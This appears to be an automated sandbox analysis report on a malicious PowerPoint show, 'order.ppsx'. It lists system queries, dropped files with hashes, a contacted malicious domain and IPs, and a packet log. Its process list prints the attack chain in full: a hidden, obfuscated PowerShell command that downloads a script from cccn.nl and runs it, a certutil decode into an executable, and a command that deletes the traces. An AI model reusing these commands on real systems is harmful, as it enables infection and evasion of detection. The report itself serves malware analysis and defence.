Code function: 10_2_0040A98B GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetModuleHandleA,GetProcessHeap,GetUserNameA,GetProcessHeap,HeapAlloc,GetClipboardViewer,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,lstrcmpA,GetProcessHeap,GetComputerNameA,GetProcessHeap,HeapAlloc,GetCursor,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardOwner,GetProcessHeap,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,CountClipboardFormats,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessWindowStation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCaptur

10_2_0040A98B

Contains functionality to query windows version

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

10_2_0040EFB9

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,	10_2_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	10_2_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,	10_2_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	10_2_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	10_2_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,EnumSystemLocalesA,	10_2_0042C859
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_0042C3CE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_1_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,__freea,	10_1_0042B9C8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_1_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_1_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	10_1_0042C5C5
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	10_1_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	10_1_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	10_1_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	10_1_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoA,___ascii_strnicmp,	10_1_0042FC9F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_1_0042C3CE

Queries information about the installed CPU (vendor, model number etc)

Show sources

Source: C:\Windows\System32\mstsc.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Queries volume information: C:\ VolumeInformation

Behavior Graph

Yara Overview

No Yara matches

Screenshot

Startup

system is w7_1

POWERPNT.EXE (PID: 2256 cmdline: 'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx' MD5: E24133DD836D99182A6227DCF6613D08)

powershell.exe (PID: 2404 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

wscript.exe (PID: 2496 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse' MD5: 979D74799EA6C8B8167869A68DF5204A)

certutil.exe (PID: 2988 cmdline: 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe MD5: 0D52559AEF4AA5EAC82F530617032283)

cmd.exe (PID: 3052 cmdline: 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

484.exe (PID: 3076 cmdline: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe MD5: 13CDBD8C31155610B628423DC2720419)

mstsc.exe (PID: 3140 cmdline: C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe' MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)

cmd.exe (PID: 3104 cmdline: 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Created / dropped Files

File Path	Type and Hashes	Malicious
C:\Users\LUKETA~1\AppData\Local\Temp\168.gop	Type: ASCII text, with very long lines, with no line terminators MD5: 9B5AC6C4FD5355700407962F7F51666C SHA: 9FDB4CD70BBFB058D450AC9A6985BF3C71840906 SHA-256: E97B266D0B5AF843E49579C65838CEC113562A053B5F87A69E8135A0A82564E5 SHA-512: AB85132D845437A7900E03C2F3FA773433815A4893E16F7716A5F800558B5F01827F25463EAFF619F804C484A1D23CDD5F2BCCC0F91B4B4D0C117E87D830B1B3	true
C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: 13CDBD8C31155610B628423DC2720419 SHA: 7633A023852D5A0B625423BFFC3BBB14B81C6A0C SHA-256: 55C69D2B82ADDD7A0CD3BEBE910CD42B7343BD3FAA7593356BCDCA13DD73A0EF SHA-512: 19139DAE43751368E19C4963C4E087C6295CC757B215A32CB95E12BDD82BB168DB91EA3385E1D08B9A5D829549DFBB34C17CA29BFCC669C7EAE51456FCD7CA49	true
C:\Users\user\AppData\Local\Temp\ii.jse	Type: data MD5: F5B3D1128731CAC04B2DC955C1A41114 SHA: 104919078A6D688E5848FF01B667B4D672B9B447 SHA-256: 55821B2BE825629D6674884D93006440D131F77BED216D36EA20E4930A280302 SHA-512: 65D8A4CB792E4865A216D25068274CA853165A17E2154F773D367876DCC36E7A7330B7488F05F4EE899E40BCAA5F3D827E1E1DF4915C9693A8EF9CAEBD6D4BFB	true
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Type: ASCII text, with CRLF line terminators MD5: 9BBBF02ED684C835719792CAE52BD605 SHA: 544F22604861FA0E90A9D3F331970B0BA23A104E SHA-256: AC3288710CDC1EA429A86CD571DB151AF605BCCAB25835368516100548B1A327 SHA-512: 656C93718453E89FC79317F85C15C3D5D121A1D168054BCB29603EC65B81599CA79A3B0F4F3E946933EC255589A9E26495CECDC4CC26E0C18DD9DBE70BF461AE	false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK	Type: MS Windows shortcut MD5: 773E77A245C432B04B130C277760CB58 SHA: C5E7E3F76CCED9C7CFDD6AFAEB0135399E0D1637 SHA-256: A9F06483B3363511B826C2B318CBF081FB2DA36E8AC6FFF610E381A831B9171C SHA-512: 7813240406CF09E844EA427FE79360CFC1BC1038F9E38232440829CB6379B870F9A7F94FB8673FD1385B91D9E47BB1CF6A838ACF51C2DF4C55F458263BB45DE2	false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8O4WJHKMFY66QYTIV0PK.temp	Type: data MD5: C875DF17852F41B1EAEA2F514899EEF9 SHA: C242F37AB873BF9C8EAACE91CB395E3C81975201 SHA-256: 8F113C9F937D0CB46759B83AE44543FF670EFB561778F48C9F18929960195247 SHA-512: 00435D3B85CEDCA472D5F830FF7A81F688044C9AD917282D55EBE7681C291009D9A248E388DA1137957B7647D9141D30A7B136BF53130D7A90121E3EFA6E9E92	false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)	Type: MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E	false
C:\~$order.ppsx	Type: data MD5: D149D8C0BFC5BE3568AF34FF1F446568 SHA: AE549B879F5AC7333E2083C30821791AB65E37D7 SHA-256: 67B893285A43D4D38D48E8DC4E5F4C1B3FD93C55047D360DDCE897E73DCC2CDA SHA-512: 2F45C25497C5BAAD493FF374728E275241312BB698EC019EB4433D0E089C72BED10213C48FF291EFD32A06D97230DECD525D58D43EC8EC7083E841D77544631C	false

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious
cccn.nl	46.21.169.110	true	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
185.159.82.38	unknown	23118	SkylineTelephone	true
8.8.8.8	United States	15169	GoogleInc	false
46.21.169.110	Netherlands	42755	TechnotopInternetBV	true

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
TrID:	PowerPoint Microsoft Office Open XML Format document (133004/1) 97.08% ZIP compressed archive (4004/1) 2.92%
File name:	order.ppsx
File size:	32895
MD5:	823c408af2d2b19088935a07c03b4222
SHA1:	df99061e8ad75929af5ac1a11b29f4122a84edaf
SHA256:	f05af917f6cbd7294bd312a6aad70d071426ce5c24cf21e6898341d9f85013c0
SHA512:	2cc9e87e0d46fdd705ed429abb837015757744783bf1e904f9f22d56288b9554a1bc450142e2b1644a4912c12a522391b354d97956e4cb94890744266249b7f9
File Content Preview:	PK........i..J................_rels/.relsUT.....*Y...J.1.........m..i.E..D.....nt...T....T....q....d.9..z..]...u..............,.,.1...as{~.~......q..$d....(.MO.s..B..1y...N1.W.H...J...8.V[.!m......D..(N.).W[]....4gwl[g..../.....PSJ.....!.2+..?.tC.........

File Icon

Network Behavior

Download Network PCAP:	Network PCAP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mai 28, 2017 17:18:54.833045006 MESZ	52401	53	192.168.1.16	8.8.8.8
Mai 28, 2017 17:18:55.158092022 MESZ	53	52401	8.8.8.8	192.168.1.16
Mai 28, 2017 17:18:55.242506981 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.242549896 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.243097067 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.243801117 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.243819952 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.446979046 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.450790882 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.450833082 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.592204094 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.620583057 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.620608091 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.620836020 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.620879889 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.658356905 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.658390045 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.658598900 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.658648014 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.691008091 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.691260099 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.691301107 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.694314957 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.694482088 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.701215982 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.701244116 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.701253891 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.701461077 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.712805033 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.719968081 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.720232010 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.726447105 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.739748001 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.739774942 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.739878893 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.775693893 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.784358978 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.784384966 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.784564018 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.784591913 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.802707911 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.802737951 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.802845955 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.802874088 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.820676088 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.820810080 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.820835114 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.834151030 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.834177971 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.834290981 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.847592115 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.847619057 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.847728014 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.856555939 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.856580019 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.856590033 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.856698990 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.861704111 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.875453949 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.875479937 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.875754118 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.875775099 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.908334970 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.908364058 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.908730984 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.908751965 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.910757065 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.910784960 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.911083937 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.911106110 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.924309015 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.924649954 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.924670935 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.931389093 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.931499004 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.940063000 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.940089941 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.940099955 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.940423012 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.944761992 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.944791079 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.944801092 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.944907904 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.961672068 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.990370035 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.990442038 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.990454912 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.990995884 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.991024971 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.991132975 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.999619961 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.999650955 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:55.999842882 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:55.999876022 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.005856037 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.005886078 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.006366014 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.006397009 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.019325018 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.019356012 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.019689083 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.019718885 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.038929939 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.038959980 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.039072990 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.039104939 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.040286064 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.040497065 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.040524960 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.046196938 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.046226025 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.046452045 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.046494961 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.056365013 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.056389093 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.056483984 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.056638956 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.056683064 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.066953897 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.066981077 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.067172050 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.067210913 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.069940090 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.069964886 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.070197105 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.070235968 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.081741095 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.081767082 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.081775904 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.082003117 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.082046032 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.084598064 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.084626913 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.084779978 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.084819078 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.099319935 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.099349976 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.099570990 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.099613905 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.104274035 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.104569912 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.107458115 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.107486010 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.107495070 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.107719898 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.112874985 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.116817951 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.116843939 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.117064953 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.117109060 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.122545004 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.122742891 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.122786045 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.126477003 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.126507044 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.126698017 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.126734972 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.137825012 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.137855053 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.138030052 MESZ	49234	80	192.168.1.16	46.21.169.110
